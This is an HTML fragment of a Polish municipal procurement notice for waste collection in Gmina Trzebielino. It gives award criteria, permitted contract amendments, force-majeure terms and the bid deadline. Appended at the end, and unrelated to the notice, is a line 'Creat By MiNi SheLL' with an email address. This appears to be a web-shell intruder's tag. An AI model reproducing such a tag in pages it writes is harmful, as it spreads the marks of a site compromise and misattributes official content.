<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zezwolenie na zbieranie odpadów i zezwolenie na przetwarzanie odpadów ( zgodnie z art. 41  ustawy z dnia 14 grudnia 2012 r.  o odpadach, Dz. U. z 2013 r. poz. 21), wpis do rejestru Głównego Inspektora Ochrony Środowiska dot. zbierania zużytego sprzętu elektrycznego i elektronicznego,</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Trzebielino,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy w sprawie niniejszego zamówienia publicznego zawarty jest w Załączniku nr 7 do SIWZ.
20.2 Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
20.3 Nawiązując do pkt. 20.2 Zamawiający przewiduje możliwość zmiany treści umowy w zakresie:
1) zmiany częstotliwości wywozu odpadów komunalnych z zachowaniem faktycznych odległości występujących na terenie Gminy Trzebielino, które będą pokonywane przez Wykonawcę w celu realizacji zamówienia i stanowią istotny element wyliczenia ceny ofertowej,
2) możliwość zmiany wynagrodzenia, za wspólnym porozumieniem strony będą mogły wprowadzić w przypadku kiedy prognozowana ilość odpadów komunalnych ulegnie zmniejszeniu lub zwiększeniu w trakcie realizacji umowy o co najmniej 10 % w stosunku do przyjętej wielkości w SIWZ. Ewentualna zmiana w tym zakresie będzie mogła być dokonana w odstępie miesięcznym w oparciu o sporządzane przez Wykonawcę zestawienia z realizacji usługi załączanych do faktur.
3) wystąpienia siły wyższej na poniższych warunkach:
a) terminy realizacji przedmiotu zamówienia oraz harmonogramu mogą ulec przesunięciu o czas wynikły wskutek siły wyższej, warunków atmosferycznych uniemożliwiających rozpoczęcie bądź kontynuowanie usługi, lub przerw w realizacji, powstałych z przyczyn zależnych od Zamawiającego,
b) przez siłę wyższą Strony rozumieją zdarzenie nagłe, nieprzewidywalne i niezależne od woli Stron, uniemożliwiające wykonanie Umowy na stałe lub na pewien czas, któremu nie można zapobiec, ani przeciwdziałać przy zachowaniu należytej staranności,
c) w razie zaistnienia zdarzenia stanowiącego przypadek wystąpienia siły wyższej, Wykonawca zobowiązuje się niezwłocznie zawiadomić Zamawiającego (a następnie potwierdzić pisemnie) o rozpoczęciu okresu występowania siły wyższej, w dniu zaistnienia zdarzenia stanowiącego przypadek siły wyższej,
d) w razie braku zawiadomienia w dniu zaistnienia zdarzenia stanowiącego przypadek siły wyższej, nie będzie możliwe przesunięcie ustalonych terminów,
e) w razie wystąpienia przypadku siły wyższej, data ustalona realizacji będzie przesunięta o czas, w którym siła wyższa uniemożliwiła kontynuację realizacji usługi pod warunkiem, że ma to bezpośredni wpływ na realizację przedmiotu umowy, o czym Strony zdecydują w Protokole Uzgodnień podpisanym przez Wykonawcę oraz Zamawiającego.
1) zmiany wynagrodzenia w przypadku zmiany ustawowej stawki VAT,
2) zmiany zakresu prac powierzonego podwykonawcom z zastrzeżeniem § 6 umowy,
3) zmian obligatoryjnych wynikających ze zmian przepisów prawa, niezależnych od stron,
4) zmiany wynagrodzenia ze względu na zmianę opłat za korzystanie ze środowiska naturalnego wpływających bezpośrednio na wartość świadczonych usług, jeżeli podwyżka wzrośnie o więcej niż 10% w stosunku do opłaty obecnie obowiązującej.
Zmiany, o których mowa w pkt 20.3 dokonywane są poprzez złożenie wniosku o zmianę w formie pisemnej przez jedną ze Stron wraz z określeniem zmiany, podaniem uzasadnienia, czasu wykonania zmiany.
Zamawiający nie zamierza zawrzeć umowy ramowej.
Jeżeli Wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy w sprawie zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert bez przeprowadzania ich ponownego badania i oceny, chyba że zachodzą przesłanki unieważnienia postępowania, o których mowa w art. 93 ust. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.trzebielino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Trzebielinie,
 77-235 Trzebielino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 10:00, miejsce: Urząd Gminy w Trzebielinie,
 77-235 Trzebielino, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com